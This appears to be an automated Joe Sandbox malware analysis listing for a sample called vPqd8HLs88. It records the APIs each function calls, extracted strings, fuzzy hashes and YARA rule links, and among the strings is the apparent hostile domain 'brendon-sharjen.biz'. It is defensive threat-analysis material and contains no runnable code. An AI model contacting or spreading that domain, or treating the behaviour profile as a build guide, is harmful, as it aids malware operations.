APIs

FreeLibrary.KERNEL32(?,?,?), ref: 0042C376
GetComputerNameExA.KERNELBASE(00000006,?,?,?,?), ref: 0042C3A8
GetComputerNameExA.KERNELBASE(00000005,?,?,?,?), ref: 0042C484

Strings

>17:, xrefs: 0042C493
Mw, xrefs: 0042C376

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: ComputerName$FreeLibrary
String ID: >17:$Mw
API String ID: 2243422189-4021892869
Opcode ID: ec9c124b06aa3a57106320d89c255d93f7a80c79bcba902fdc280854a85d9ea5
Instruction ID: b4fee659546a649315a5339d2cb94c5415abeff9094927cede1f35a314837d9c
Opcode Fuzzy Hash: ec9c124b06aa3a57106320d89c255d93f7a80c79bcba902fdc280854a85d9ea5
Instruction Fuzzy Hash: FCF157312047918FDB158F39D4D0766BBE2AFA7300F58859EC4D68F396C739A806CB69

Function 004089E0 Relevance: 6.1, APIs: 4, Instructions: 99
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408A01
GetCurrentThreadId.KERNEL32 ref: 00408A09
GetForegroundWindow.USER32 ref: 00408A71
ExitProcess.KERNEL32 ref: 00408B1F

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: CurrentProcess$ExitForegroundThreadWindow
String ID:
API String ID: 3118123366-0
Opcode ID: 7179407272bce60cdc6937b4fcffc8bd720db954a79fdd5ac3918b57226f4f70
Instruction ID: 16e3a023297d6285cce21037b579bc23de6c51e586bbc8d1bf9774ec88c5cea3
Opcode Fuzzy Hash: 7179407272bce60cdc6937b4fcffc8bd720db954a79fdd5ac3918b57226f4f70
Instruction Fuzzy Hash: D1316973F002182BCB186AB98D47366B5D64BC4304F0E413E6989BB3D6ED7C5C0946C8

Function 00423E10 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 546
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?B, xrefs: 004244F9, 0042450E
LN, xrefs: 0042401A

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: ?B$LN
API String ID: 0-2731336514
Opcode ID: fad7d7507273740611aaf3b92a54d75ad8fcafff93fe75621bc3e8f0dee9342a
Instruction ID: 8e3b3c9c738891b592dad0537fa245508e192562bdb33556c0ffa6f3f50579c4
Opcode Fuzzy Hash: fad7d7507273740611aaf3b92a54d75ad8fcafff93fe75621bc3e8f0dee9342a
Instruction Fuzzy Hash: DB0210B4A083508FD314DF65E89262BBBF0EFC6714F54893DE5918B391DB788909CB4A

Function 0042C856 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 375
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

=7>4, xrefs: 0042CDED
.g~_, xrefs: 0042CDF4

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: .g~_$=7>4
API String ID: 0-1087258636
Opcode ID: 810adcc03c9076cc7768c1319066dfe941a69f1b4151d3db999518d95fe0f983
Instruction ID: 426a6555080ef9445f2e063ec60bb6acfd642551908969b8c14281614fb6566d
Opcode Fuzzy Hash: 810adcc03c9076cc7768c1319066dfe941a69f1b4151d3db999518d95fe0f983
Instruction Fuzzy Hash: 73B1B0746047918FD719CF3AD0A0766BFE1AF57304F6885AEC4DA8B392C639D806CB54

Function 0042CBC2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CC9A

Strings

=7>4, xrefs: 0042CDED
.g~_, xrefs: 0042CDF4

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: .g~_$=7>4
API String ID: 3960555810-1087258636
Opcode ID: eef3c031c616ececf3b85df479716983cec1cbe2fa7c90ef5724d57e33dac313
Instruction ID: 02d0efe261b8549ff949b6c2b077e4225431b3a6a2693acd9c4e448e19cbd7f2
Opcode Fuzzy Hash: eef3c031c616ececf3b85df479716983cec1cbe2fa7c90ef5724d57e33dac313
Instruction Fuzzy Hash: 79A1D1746046918FD719CF39D0A0766BFE1AF57304F6981AEC49A8B352CA39D806CB58

Function 0040D60B Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 358
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040D617

Strings

brendon-sharjen.biz, xrefs: 0040DA81
^ZPh, xrefs: 0040D6F9

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: Uninitialize
String ID: ^ZPh$brendon-sharjen.biz
API String ID: 3861434553-1931448812
Opcode ID: 6d85464a4c27d714253e41de2a24cdd7121462f98545f0207570b49a4807941d
Instruction ID: 26858edf45d91ebc42d41cec0cb2fb653e020a8aad098dae5d7e15d33482b42b
Opcode Fuzzy Hash: 6d85464a4c27d714253e41de2a24cdd7121462f98545f0207570b49a4807941d
Instruction Fuzzy Hash: 47B11FB154C3C18FD335CF69C8907ABBBE1ABD2300F09896DC4D9AB241DA794809CB96

Function 0040BCF7 Relevance: 3.8, Strings: 3, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\ U", xrefs: 0040BD47
[,R., xrefs: 0040BD60
#$, xrefs: 0040BD4F

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: #$$[,R.$\ U"
API String ID: 0-750793529
Opcode ID: f1b01fd242b07a04e8f8bcacdafb8edcbc1296bc280c2f5b12c6c3b95147904b
Instruction ID: 60e7d295e6879848fbb1194ea7d33ac138829f76c5ea86aabfca38139a05cf14
Opcode Fuzzy Hash: f1b01fd242b07a04e8f8bcacdafb8edcbc1296bc280c2f5b12c6c3b95147904b
Instruction Fuzzy Hash: D921E276B583409FC3188E248C8139ABBE39BC2210F29983DE595D7365D979C4068B05

Function 009207A6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009207CE
Module32First.KERNEL32(00000000,00000224), ref: 009207EE

Memory Dump Source

Source File: 00000000.00000002.1667924711.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 0451bf40bb218305a00c975eb98a5446b3638d0c081193ac017edfc6b2f1c59c
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: EBF062311017216BD7203AB5BC8DB6F76ECAF89765F100528E642910C2DA70F8454A61

Function 0043E8E0 Relevance: 2.8, Strings: 2, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

], xrefs: 0043E957
], xrefs: 0043E994

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: InitializeThunk
String ID: ]$]
API String ID: 2994545307-2815796728
Opcode ID: 6ad192aa84517224c986235b749ae1724dd62075e0061993727cf64a284edc29
Instruction ID: 64d1f92de71d6b1c7c4b11b4d6aaa6aff454503c9ce1f8216010a09425cc65bb
Opcode Fuzzy Hash: 6ad192aa84517224c986235b749ae1724dd62075e0061993727cf64a284edc29
Instruction Fuzzy Hash: 27A147366093108BD328DF15C89167BB7A2EBD9310F18993EE9D657391CA39AC05CB86

Function 0043B540 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043D75B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B56E

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043BC5A Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

@ONM, xrefs: 0043BCA1

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: InitializeThunk
String ID: @ONM
API String ID: 2994545307-2801865338
Opcode ID: 09fc53d9a3b425db47ee58b1726e9afe861efef29a5908f785b22fff14549206
Instruction ID: 66c126288edb15b1be03d662bb22b8e2252d89dbcbb921d107ff27fe6a362d93
Opcode Fuzzy Hash: 09fc53d9a3b425db47ee58b1726e9afe861efef29a5908f785b22fff14549206
Instruction Fuzzy Hash: E531353020414AABCB28CB18DC8163B3616FB4F321F28653EE917C779ADF309C018B88

Function 0043DE70 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

@, xrefs: 0043DED8

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 2b742b6e7e52554bc4e96e186ea58421fbb4f8265e3d068c29b8cb15bb369415
Instruction ID: 0b7b3504051f5e1ff1aa4768d83721eb93ddf2e73f62a010e3e9f82a19ad0d6f
Opcode Fuzzy Hash: 2b742b6e7e52554bc4e96e186ea58421fbb4f8265e3d068c29b8cb15bb369415
Instruction Fuzzy Hash: 673135B59083049FC314DF58D8C16ABB7F5EB8A314F14983DEA9587361D3399908CB6A

Function 00410C48 Relevance: .8, Instructions: 846COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7507d81c928ac82049bd46078ae2362f1992282f42cbd9c1703c075f6b36e57
Instruction ID: 2639d11f868ecb2a67b7e53cfbbff553806d46d54c1d273c0f2991630b5050a0
Opcode Fuzzy Hash: a7507d81c928ac82049bd46078ae2362f1992282f42cbd9c1703c075f6b36e57
Instruction Fuzzy Hash: ED72D6B5A04B408FD714DF38C58539ABBE1AB59310F198A3ED5EB877D2D638A445CB02

Function 00411754 Relevance: .6, Instructions: 558COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cc0c3950cfe6f11f92236d13f5addb0acb8a3648b3feb047aa27851d0f8a62b
Instruction ID: 98ec66b8c1a97905fe01f5c0427ca16a74e3336330c12707f3f83f9c89bcd337
Opcode Fuzzy Hash: 2cc0c3950cfe6f11f92236d13f5addb0acb8a3648b3feb047aa27851d0f8a62b
Instruction Fuzzy Hash: 712208B5A04B408FD710DF38C5853AABBE1AF45314F19893ED9DB87392E638E845CB46

Function 00426B10 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d707122cae7f0d556f199508d1b0c371c1a76941f428f3aad6b84a9ecb4105df
Instruction ID: 655a0559c217653cef3fca3199031bfa73ff368d8ccf1923f27e202b99122e6b
Opcode Fuzzy Hash: d707122cae7f0d556f199508d1b0c371c1a76941f428f3aad6b84a9ecb4105df
Instruction Fuzzy Hash: 78715976B043604BD7249F25EC8272B73A2EFC5314F5A843EE88587386E73CAC05875A

Function 00439AD0 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c5c7ecc3cb3bebe657ca10c1da1bb97965d6baeb863afde9995c6337e402985
Instruction ID: 31a4208be66890e024ccdaba488de7446d06012f33711c004bb2343707e414f1
Opcode Fuzzy Hash: 9c5c7ecc3cb3bebe657ca10c1da1bb97965d6baeb863afde9995c6337e402985
Instruction Fuzzy Hash: 43517D36B042105BD7249F29D88276BB7D2EBCD714F29953EE8C55B386D2785C02C7C9

Function 0043DFA0 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 48d73303157af394a4848b78df87eb1e396560a21bdf94b385418d6b969c2eac
Instruction ID: e0930f2ca75b34a07e50f2291cc182f3ed73123002e8a1e8e1ce327a60199e33
Opcode Fuzzy Hash: 48d73303157af394a4848b78df87eb1e396560a21bdf94b385418d6b969c2eac
Instruction Fuzzy Hash: F87199356042119BCB24EF19C850A7FB3E6EFC9310F19942DE986973A1EB34AC11CB86

Function 00436BE0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e84553ee993f17e0f9f3cf7f978070c891da6f68e09c3ba4cab07fe54e0e0bb
Instruction ID: e8dad1dda0253b92e63a19101ee9763ddde1de1650ff40d59ee9a09597a5be0b
Opcode Fuzzy Hash: 7e84553ee993f17e0f9f3cf7f978070c891da6f68e09c3ba4cab07fe54e0e0bb
Instruction Fuzzy Hash: 1D81E33410C3819ED3008B28C19536BBFE19B8B318F29AA5EE4D5473D2C779C949DB4B

Function 0042CF7E Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bde37daa5f4bb2f625f57553814b221622b842ad72843203904d7349dd25a24
Instruction ID: 331d108b3c03833bbf54b170f9c9f8a218aa15eb268d62f8f521e7b1f3013f26
Opcode Fuzzy Hash: 4bde37daa5f4bb2f625f57553814b221622b842ad72843203904d7349dd25a24
Instruction Fuzzy Hash: 6E415B31B156518BD72D8F399851737BB93EB9B308F68846EC097C7396DA3998038608

Function 00409E40 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 613f3ee8998684b13fb499731a3423b19704c9ffa01a7396155ed73d596b650c
Instruction ID: 773bb1a58b939dcc9829a826cd8202c9a204143afeafa677da0ea0e5930860f3
Opcode Fuzzy Hash: 613f3ee8998684b13fb499731a3423b19704c9ffa01a7396155ed73d596b650c
Instruction Fuzzy Hash: 0031A171E412588BDB28CF69CC567EBBB75EB49300F0441BDE589E7341C7388D458BA9

Function 0095003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0095024D

Strings

kernel32.dll, xrefs: 0095008F, 00950095
cess, xrefs: 0095018D

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 3011bf755f7646c36f5d90342c8d2cb30f539888ed39e4fcd6c210434b9454ab
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 69527974A002299FDB64CF59C985BA8BBB1BF49305F1480D9E94DAB251DB30AE89DF10

Function 00950E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00950223,?,?), ref: 00950E19
SetErrorMode.KERNELBASE(00000000,?,?,00950223,?,?), ref: 00950E1E

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 93ffa48b423e2448172ef2a8d6249573cbbb65ae7c140b352c25c32cb519ab2f
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 10D0123114512877D7002A95DC09BCD7B1CDF05B63F108411FB0DD9080C770994047E5

Function 0043C20A Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043C3F1

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 0aa73ecefab502f87d0238491b6a79a1c80c0822a31435018b4c0b9694549fe4
Instruction ID: 0fb141bd630550d023d235e03bb0a068ea4bc92f3d49284556085a9dbf0f0789
Opcode Fuzzy Hash: 0aa73ecefab502f87d0238491b6a79a1c80c0822a31435018b4c0b9694549fe4
Instruction Fuzzy Hash: 1211C47AB405108BDF0CCF68EC926BE7762FB99305B08907DC107E7355DA389802CA59

Function 0043B4E0 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B1DD,00000000,00000001,?,?,00000000,00000000), ref: 0043B512

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6b8ab5ca455b7d86b60e36ce38f21e23a901100ba5adce51ad5934b64650e32b
Instruction ID: b6d615239973c33224b8ca103be8f3a05f384056a6d2bc58008467f0f73ad7d6
Opcode Fuzzy Hash: 6b8ab5ca455b7d86b60e36ce38f21e23a901100ba5adce51ad5934b64650e32b
Instruction Fuzzy Hash: E5E02B36424361BBC2003F657C06B1B3668EF8B754F06187AF405D6121E778E801C1DF

Function 00431460 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004314AD

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: d0ce215715e739e6971576e73cbcfd1c432512fca68909463d6cb68cb374c0a9
Instruction ID: 8b320dee32717863099208e07bd04a680d330f802a33af6dfc3ea266f1ff2f49
Opcode Fuzzy Hash: d0ce215715e739e6971576e73cbcfd1c432512fca68909463d6cb68cb374c0a9
Instruction Fuzzy Hash: 1AF0F4B52087028FE310CF24D59870BBBE1FB84304F11891CE5A44B351C7B9E9498F82

Function 00439A90 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,00412CA3), ref: 00439AAE

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: accac4bdf124adb22f5a5637fe6dd63157f5b43de9a3fffb5cdd194092895033
Instruction ID: f1076ebbacd474c7597c0b9c53cb4795e21d73dddf39306e7d7a5043f366a07f
Opcode Fuzzy Hash: accac4bdf124adb22f5a5637fe6dd63157f5b43de9a3fffb5cdd194092895033
Instruction Fuzzy Hash: D2D05E34508221DBD2005F14EC45B463668EF0B261F030461B408AB172C220DC408698

Function 0042FCA8 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042FCED

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: a480a4379951b7bc2b08d92c0a487ddd4aeb4c6621721ffe3e76362c710f4022
Instruction ID: 363b216e4dc6fb2371405087942ec1a5024e88427a593710995f8bdef46d2750
Opcode Fuzzy Hash: a480a4379951b7bc2b08d92c0a487ddd4aeb4c6621721ffe3e76362c710f4022
Instruction Fuzzy Hash: 9DF09EB45097029FD354DF24D5A871ABBF0EF85744F11892CE4A58B390CB759558CF82

Function 0040C960 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C973

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2ed02a752ed03975eef8dcff157f80287161175d0aea0a6baab1b69ceadc6312
Instruction ID: 101b116d1667565aedf8092037dc78c98f2439bf861108303089d444f25b5fd7
Opcode Fuzzy Hash: 2ed02a752ed03975eef8dcff157f80287161175d0aea0a6baab1b69ceadc6312
Instruction Fuzzy Hash: D7E07234B201002BC328AB2CDC06F823B6A9B9B320F48823DB6128A3C4EC307814C235

Function 0043C3DD Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043C3F1

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 43d906a33079cf616210f0fb0059d934b558415631a6ba274dd12b3783835321
Instruction ID: ec05bad9c0389b36cac6b64b7751d3ebfc44111d8af745157a4c2312dec8b903
Opcode Fuzzy Hash: 43d906a33079cf616210f0fb0059d934b558415631a6ba274dd12b3783835321
Instruction Fuzzy Hash: E5E04FBAE00510CFDF14CF65EC416593762BB8E345B194079E901D3366DA38AD06CB1A

Function 0040C9A2 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

